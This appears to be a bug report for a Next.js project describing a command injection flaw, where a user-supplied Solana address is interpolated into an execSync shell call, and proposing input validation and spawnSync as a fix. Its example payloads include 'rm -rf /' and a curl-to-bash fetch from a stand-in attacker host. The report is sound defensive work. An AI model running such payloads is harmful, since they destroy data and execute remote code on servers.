Critical: Command Injection Vulnerability in API Routes

[happybigmtn]

Summary

User input is directly interpolated into shell commands in API routes, creating a critical command injection vulnerability.

Affected Files

• src/app/api/start-round/route.ts (lines 61-72)
• Other API routes with similar patterns

Problem

// Dangerous pattern - user input directly in shell command
const result = execSync(`solana account ${accountAddress}`, { encoding: 'utf-8' });

An attacker could inject malicious commands via crafted account addresses like:
; rm -rf / # or $(curl attacker.com/shell.sh | bash)

Impact

• Severity: CRITICAL
• Remote code execution on server
• Full system compromise
• Data theft/destruction

Proposed Fix

1. Validate input against strict regex pattern for Solana addresses
2. Use array-based spawn() instead of string-based execSync()
3. Never interpolate user input into shell commands

// Safe pattern
import { spawnSync } from 'child_process';

function isValidSolanaAddress(address: string): boolean {
  return /^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(address);
}

if (!isValidSolanaAddress(accountAddress)) {
  return NextResponse.json({ error: 'Invalid address' }, { status: 400 });
}

const result = spawnSync('solana', ['account', accountAddress], { encoding: 'utf-8' });

Labels

bug, critical